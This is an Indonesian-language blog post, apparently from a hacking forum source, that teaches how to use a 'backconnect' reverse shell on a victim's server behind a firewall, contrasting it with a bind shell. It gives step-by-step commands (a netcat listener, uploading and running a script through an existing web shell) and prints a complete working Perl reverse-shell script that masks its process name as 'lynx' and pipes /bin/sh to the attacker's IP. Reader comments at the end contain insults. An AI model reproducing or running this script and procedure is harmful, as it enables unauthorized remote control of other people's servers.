Kalau dithread sebelumnya bindshell adalah melakukan koneksi ke server korban dengan membuka port diserver. Maka backconnect beda. ingin tau kelanjutannya simak thread berikut.
Apa itu backconnect ?
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita.
Apa perbedaannya sama bindshell ?
bedanya, kalo backconnect adalah melakukan koneksi balik dari shell, ke komputer kita, jadi dikomputer kita diset Listening port.
Bagaimana cara penggunaannya ?
cara penggunanya hampir sama dengan bindshell cuma dibalik.
* BackConnect Lewat Shell
Yang harus dilakukan terlebih dahulu adalah upload script backconnectnya. disini saya menggunakan script perl untuk backconnect punyanya om ArRay.
1. Set mode listening dulu dinetcat anda:
ex: nc -vlp portnya
jadi: nc -vlp 13123
akan muncul tulisan: listening on [any] 13123 ...
2. Setelah itu upload script bindshell.pl nya dishell anda. kemudian ubah permissionnya menjadi 777. chmod 777 bindshell.pl
3. Jalankan perintah berikut dishell:
ex: perl bindshell.pl [ip_anda] [port]
jadi: perl bindshell.pl 192.168.202.4 13123
tunggulah beberapa saat, jika sudah connect ke kompi anda. maka selamat anda berhasil melakukan back-connect.
Script bindshell.pl nya:
Code:
#!/usr/bin/perl* Kendala yang sering terjadi yang mengakibatkan tidak bisa backconnect ke Kompie
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Jadi begini ceritanya. misalkan anda sudah melakukan back-connect dengan berbagai cara tidak ada yang berhasil. maka kemungkinan kendala yang terjadi adalah sang admin/empunya server menutup fungsi Listening. (lock) jadi, dapat mengakibatkan gagal koneksi balik ke komputer kita. sehingga mendapatkan error connection refused/NOTSOCK dinetcat. CMIIW
Sumber:
Always With US BeaCheater
3 komentar:
Blognya kek anjing banyak iklan sampahhh
Adminnya tolol miskin retjehhh
saya kenal itu on ArRay :D
Posting Komentar